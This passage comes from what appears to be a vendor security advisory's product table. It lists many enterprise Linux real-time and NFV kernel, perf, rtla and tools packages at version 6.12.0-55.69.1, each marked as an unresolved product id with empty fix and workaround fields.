| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: NFV-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
